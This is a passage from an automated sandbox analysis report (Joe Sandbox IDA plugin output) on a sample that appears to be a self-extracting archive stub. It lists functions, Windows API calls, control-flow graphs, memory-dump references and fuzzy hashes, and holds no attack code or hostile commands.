      • Part of subcall function 0006A7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006DBDC,00000000,?,000680A1,?,00000008,?,0006A861,?,?,?), ref: 0006A820
    • __freea.LIBCMT ref: 0006BCFB
    • __freea.LIBCMT ref: 0006BD20
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ByteCharMultiWide__freea$AllocateHeap
    • String ID:
    • API String ID: 1414292761-0
    • Opcode ID: 632eceb520d9c921186ff54f7f390835f0907ad235d91bc8db1f0e616650b143
    • Instruction ID: c3a89d0e8cd689d6217f1bea262fbcfb14b7b0a18264deb6a6de104661fb8a50
    • Opcode Fuzzy Hash: 632eceb520d9c921186ff54f7f390835f0907ad235d91bc8db1f0e616650b143
    • Instruction Fuzzy Hash: D951E0B2600216ABEB259F65CC42EBF77EBEF44760F144668FD04DA141EF34DD8086A0
    Function 0005BBB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 790 5bbb0-5bbcf GetClassNameW 791 5bbf7-5bbf9 790->791 792 5bbd1-5bbe6 call 53306 790->792 794 5bc04-5bc06 791->794 795 5bbfb-5bbfd 791->795 797 5bbf6 792->797 798 5bbe8-5bbf4 FindWindowExW 792->798 795->794 797->791 798->797
    APIs
    • GetClassNameW.USER32(?,?,00000050), ref: 0005BBC7
    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0005BBFE
      • Part of subcall function 00053306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,0004D523,00000000,.exe,?,?,00000800,?,?,?,00059E4C), ref: 0005331C
    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0005BBEE
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AutoClassCompareCompleteFindNameStringWindow
    • String ID: @UHv$EDIT
    • API String ID: 4243998846-761748159
    • Opcode ID: 3cbbb45eadae9a2049c9c1749ec728e46d2e721de360bac9f5d3b12e7e47bb47
    • Instruction ID: 2a7527e06d427a25cc57e3452c1390bf655e18028f816603df0ce28cb00a2779
    • Opcode Fuzzy Hash: 3cbbb45eadae9a2049c9c1749ec728e46d2e721de360bac9f5d3b12e7e47bb47
    • Instruction Fuzzy Hash: C0F0AE32600B1877E73056159C09FEF76ACBF46B42F450051BE01F61C5DBA4E905C5F9
    Function 0005BD0B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
    Download Yara Rule

    Control-flow Graph

    APIs
      • Part of subcall function 00051B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00051B4F
      • Part of subcall function 00051B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00050633,Crypt32.dll,00000000,000506AD,00000200,?,00050690,00000000,00000000,?), ref: 00051B71
    • OleInitialize.OLE32(00000000), ref: 0005BD24
    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0005BD5B
    • SHGetMalloc.SHELL32(0008A460), ref: 0005BD65
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
    • String ID: riched20.dll$3Ro
    • API String ID: 3498096277-3613677438
    • Opcode ID: 230f60d169611d9b8358ddda418fbd31f1e5482ad57ea1eba1ab6d7699550b52
    • Instruction ID: f24bd8285f5fdfdecf4bdcd6e99fced0f427d653000e50b40fc0bd723569619a
    • Opcode Fuzzy Hash: 230f60d169611d9b8358ddda418fbd31f1e5482ad57ea1eba1ab6d7699550b52
    • Instruction Fuzzy Hash: 72F049B1D00609ABDB10AF99CC499EFFBFCFF85302F00401AE910A2241DBB846098BA1
    Function 0004AB40 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 803 4ab40-4ab61 call 5ffc0 806 4ab63-4ab66 803->806 807 4ab6c 803->807 806->807 808 4ab68-4ab6a 806->808 809 4ab6e-4ab7f 807->809 808->809 810 4ab87-4ab91 809->810 811 4ab81 809->811 812 4ab96-4aba3 call 479e5 810->812 813 4ab93 810->813 811->810 816 4aba5 812->816 817 4abab-4abca CreateFileW 812->817 813->812 816->817 818 4abcc-4abee GetLastError call 4cf32 817->818 819 4ac1b-4ac1f 817->819 823 4ac28-4ac2d 818->823 827 4abf0-4ac13 CreateFileW GetLastError 818->827 821 4ac23-4ac26 819->821 821->823 824 4ac39-4ac3e 821->824 823->824 828 4ac2f 823->828 825 4ac40-4ac43 824->825 826 4ac5f-4ac70 824->826 825->826 829 4ac45-4ac59 SetFileTime 825->829 830 4ac72-4ac8a call 51928 826->830 831 4ac8e-4ac99 826->831 827->821 832 4ac15-4ac19 827->832 828->824 829->826 830->831 832->821
    APIs
    • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00048243,?,00000005,?,00000011), ref: 0004ABBF
    • GetLastError.KERNEL32(?,?,00048243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0004ABCC
    • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00048243,?,00000005,?), ref: 0004AC02
    • GetLastError.KERNEL32(?,?,00048243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0004AC0A
    • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00048243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0004AC59
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: File$CreateErrorLast$Time
    • String ID:
    • API String ID: 1999340476-0
    • Opcode ID: 18a68ede994cff022d8ec05de10625592841bb845e7dfe951d408994086f6d0f
    • Instruction ID: c51f943b9b9c873c5dbedd6f3c094010edfe55b40b30eafcb3565755d3a9b193
    • Opcode Fuzzy Hash: 18a68ede994cff022d8ec05de10625592841bb845e7dfe951d408994086f6d0f
    • Instruction Fuzzy Hash: 91312B70A847457FE7709F24DC45BDAB7D4BB06320F100B29F9A4961D2D3B96884CBDA
    Function 00052206 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
    Download Yara Rule

    Control-flow Graph

    APIs
      • Part of subcall function 000524DF: ResetEvent.KERNEL32(?), ref: 000524F1
      • Part of subcall function 000524DF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00052505
    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 0005223A
    • CloseHandle.KERNEL32(?,?), ref: 00052254
    • DeleteCriticalSection.KERNEL32(?), ref: 0005226D
    • CloseHandle.KERNEL32(?), ref: 00052279
    • CloseHandle.KERNEL32(?), ref: 00052285
      • Part of subcall function 000522FC: WaitForSingleObject.KERNEL32(?,000000FF,00052516,?), ref: 00052302
      • Part of subcall function 000522FC: GetLastError.KERNEL32(?), ref: 0005230E
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
    • String ID:
    • API String ID: 1868215902-0
    • Opcode ID: 3fc01ab24251e151c6e78f26b5889486b59c206a4d7db51a708a2e75bc980606
    • Instruction ID: df1a974991d32760761844a2cd0bf03aa7163fe2ee55c736d8208cf209e3a99f
    • Opcode Fuzzy Hash: 3fc01ab24251e151c6e78f26b5889486b59c206a4d7db51a708a2e75bc980606
    • Instruction Fuzzy Hash: 1C018876800744EFD7229F64DD85BC6BBA9FF08711F004929F26E62160CB797994DB90
    Function 0005C748 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 870 5c748-5c761 PeekMessageW 871 5c763-5c777 KiUserCallbackDispatcher 870->871 872 5c79c-5c79e 870->872 873 5c779-5c786 IsDialogMessageW 871->873 874 5c788-5c796 TranslateMessage DispatchMessageW 871->874 873->872 873->874 874->872
    APIs
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005C759
    • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 0005C76A
    • IsDialogMessageW.USER32(00010468,?), ref: 0005C77E
    • TranslateMessage.USER32(?), ref: 0005C78C
    • DispatchMessageW.USER32(?), ref: 0005C796
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Message$CallbackDialogDispatchDispatcherPeekTranslateUser
    • String ID:
    • API String ID: 3531142305-0
    • Opcode ID: 0e475314390cf6945fd8486c9266b842e020895465beaba6a2e95b6d7f2df632
    • Instruction ID: 1492bd27452cd12022c063efea616360beaa4fca2fef1fe9a1609eb202fda01d
    • Opcode Fuzzy Hash: 0e475314390cf6945fd8486c9266b842e020895465beaba6a2e95b6d7f2df632
    • Instruction Fuzzy Hash: 2FF0BD71901619ABAF209BA19C4DDDB7FBCFF063927404415B906D2010E778D505CBF0
    Function 0005ED1E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 875 5ed1e-5ed52 call 5ffc0 SetEnvironmentVariableW call 51697 880 5ed54-5ed58 875->880 881 5ed76-5ed78 875->881 882 5ed61-5ed68 call 517b3 880->882 885 5ed5a-5ed60 882->885 886 5ed6a-5ed70 SetEnvironmentVariableW 882->886 885->882 886->881
    APIs
    • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0005ED34
    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0005ED70
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: EnvironmentVariable
    • String ID: sfxcmd$sfxpar
    • API String ID: 1431749950-3493335439
    • Opcode ID: 5fa29c2de8c285297abc1c77ac17705eb7c52f39602f00ec427ebd22ead47402
    • Instruction ID: ddbfdd20a4311c866e93fb6179fef858b603d7bbde920c833127e66b3ffb40d4
    • Opcode Fuzzy Hash: 5fa29c2de8c285297abc1c77ac17705eb7c52f39602f00ec427ebd22ead47402
    • Instruction Fuzzy Hash: AEF0A771804634A6DB202B90CC09FEB7BA8DF15743B444061BD89A6052EB698988C6B1
    Function 00064D92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 887 64d92-64da7 LoadLibraryExW 888 64ddb-64ddc 887->888 889 64da9-64db2 GetLastError 887->889 890 64db4-64dc8 call 67458 889->890 891 64dd9 889->891 890->891 894 64dca-64dd8 LoadLibraryExW 890->894 891->888
    APIs
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00064D43,00000000,?,000A40C4,?,?,?,00064EE6,00000004,InitializeCriticalSectionEx,00077424,InitializeCriticalSectionEx), ref: 00064D9F
    • GetLastError.KERNEL32(?,00064D43,00000000,?,000A40C4,?,?,?,00064EE6,00000004,InitializeCriticalSectionEx,00077424,InitializeCriticalSectionEx,00000000,?,00064C9D), ref: 00064DA9
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00064DD1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID: api-ms-
    • API String ID: 3177248105-2084034818
    • Opcode ID: 4bbc8211bb36f01c2d9b5e9e0da527d326e4bb1a224e777bff8d6576aa5fed22
    • Instruction ID: 47a3019e063d814fdd631770ed4eb1c30ada10e3bc698cd85b8df33c642bf285
    • Opcode Fuzzy Hash: 4bbc8211bb36f01c2d9b5e9e0da527d326e4bb1a224e777bff8d6576aa5fed22
    • Instruction Fuzzy Hash: 22E04F34E84208F7FF101B60EC06B593F9AAF10B55F104020FA0DB84F1DB6A99A19694
    Function 0004A9E5 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 895 4a9e5-4a9f1 896 4a9f3-4a9fb GetStdHandle 895->896 897 4a9fe-4aa15 ReadFile 895->897 896->897 898 4aa17-4aa20 call 4ab1c 897->898 899 4aa71 897->899 903 4aa22-4aa2a 898->903 904 4aa39-4aa3d 898->904 901 4aa74-4aa77 899->901 903->904 905 4aa2c 903->905 906 4aa4e-4aa52 904->906 907 4aa3f-4aa48 GetLastError 904->907 908 4aa2d-4aa37 call 4a9e5 905->908 910 4aa54-4aa5c 906->910 911 4aa6c-4aa6f 906->911 907->906 909 4aa4a-4aa4c 907->909 908->901 909->901 910->911 913 4aa5e-4aa67 GetLastError 910->913 911->901 913->911 915 4aa69-4aa6a 913->915 915->908
    APIs
    • GetStdHandle.KERNEL32(000000F6), ref: 0004A9F5
    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0004AA0D
    • GetLastError.KERNEL32 ref: 0004AA3F
    • GetLastError.KERNEL32 ref: 0004AA5E
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ErrorLast$FileHandleRead
    • String ID:
    • API String ID: 2244327787-0
    • Opcode ID: 47413daa3e8223f028fde2e86829dffaa63f18fd84c83e2cea559c705d35c749
    • Instruction ID: 65a346271f1c9502ec53e225d9dcd3a0fb04b1afe73227836e5d63d5496b41cc
    • Opcode Fuzzy Hash: 47413daa3e8223f028fde2e86829dffaa63f18fd84c83e2cea559c705d35c749
    • Instruction Fuzzy Hash: BB11A0B5B80204EBDF709F64DA046AE37E9BB07360F104636F95691190C778CE90DB9B
    Function 0006BEE4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0004EA30,00000000,00000000,?,0006BE8B,0004EA30,00000000,00000000,00000000,?,0006C088,00000006,FlsSetValue), ref: 0006BF16
    • GetLastError.KERNEL32(?,0006BE8B,0004EA30,00000000,00000000,00000000,?,0006C088,00000006,FlsSetValue,00078A00,FlsSetValue,00000000,00000364,?,0006A5D7), ref: 0006BF22
    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0006BE8B,0004EA30,00000000,00000000,00000000,?,0006C088,00000006,FlsSetValue,00078A00,FlsSetValue,00000000), ref: 0006BF30
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: LibraryLoad$ErrorLast
    • String ID:
    • API String ID: 3177248105-0
    • Opcode ID: 4191f38646966b593eb289db9e8bea7cde236b11cfd6332d9911f44c1d75763b
    • Instruction ID: 228dc7eb90e7593a853fab0c2d8e46533d5c1a8bed2fc64cee8ecc029368cfee
    • Opcode Fuzzy Hash: 4191f38646966b593eb289db9e8bea7cde236b11cfd6332d9911f44c1d75763b
    • Instruction Fuzzy Hash: BC0147727112229BDB304B28AC44A5B77D9EF517A17110230FA0EE3161CB28D880CAE0
    Function 0004B20A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
    Download Yara Rule
    APIs
    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0004E79B,00000001,?,?,?,00000000,000566B2,?,?,?), ref: 0004B22E
    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,000566B2,?,?,?,?,?,00056174,?), ref: 0004B275
    • WriteFile.KERNEL32(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0004E79B,00000001,?,?), ref: 0004B2A1
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: FileWrite$Handle
    • String ID:
    • API String ID: 4209713984-0
    • Opcode ID: d2b83aa9b0bb4d4e0f00bd3486bdaa297e4263733cf250857c78674283f31343
    • Instruction ID: bfe34fe0315550eaef4839c6ab563dabf81f1b12027db34f3c0d3bcd08e55124
    • Opcode Fuzzy Hash: d2b83aa9b0bb4d4e0f00bd3486bdaa297e4263733cf250857c78674283f31343
    • Instruction Fuzzy Hash: A431E2B1248305AFEB14CF24D918BAE77E5FB81715F00052CF98567290CBB8ED48CBA6
    Function 0004B542 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0004D68B: _wcslen.LIBCMT ref: 0004D691
    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B569
    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B59C
    • GetLastError.KERNEL32(?,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B5B9
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CreateDirectory$ErrorLast_wcslen
    • String ID:
    • API String ID: 2260680371-0
    • Opcode ID: a08ad618bd571e1ac11907e0095ecec52dbb8777b3bab07b4345ee302d82592e
    • Instruction ID: 7d7e85cfd0b6e4f8a37d76ce7b3d4fb9bbd551711640daf3aa03bf40a91192ab
    • Opcode Fuzzy Hash: a08ad618bd571e1ac11907e0095ecec52dbb8777b3bab07b4345ee302d82592e
    • Instruction Fuzzy Hash: 3E01D8F16046146AEF616B705C45BFEB29C9F05780F044435F901E6092DB68DA8187AD
    Function 0006CA43 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
    Download Yara Rule
    APIs
    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0006CA68
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Info
    • String ID:
    • API String ID: 1807457897-3916222277
    • Opcode ID: 2d273ff484dfb011e25cb551966dcb8b37c083cbcc880bee102db87466103a9b
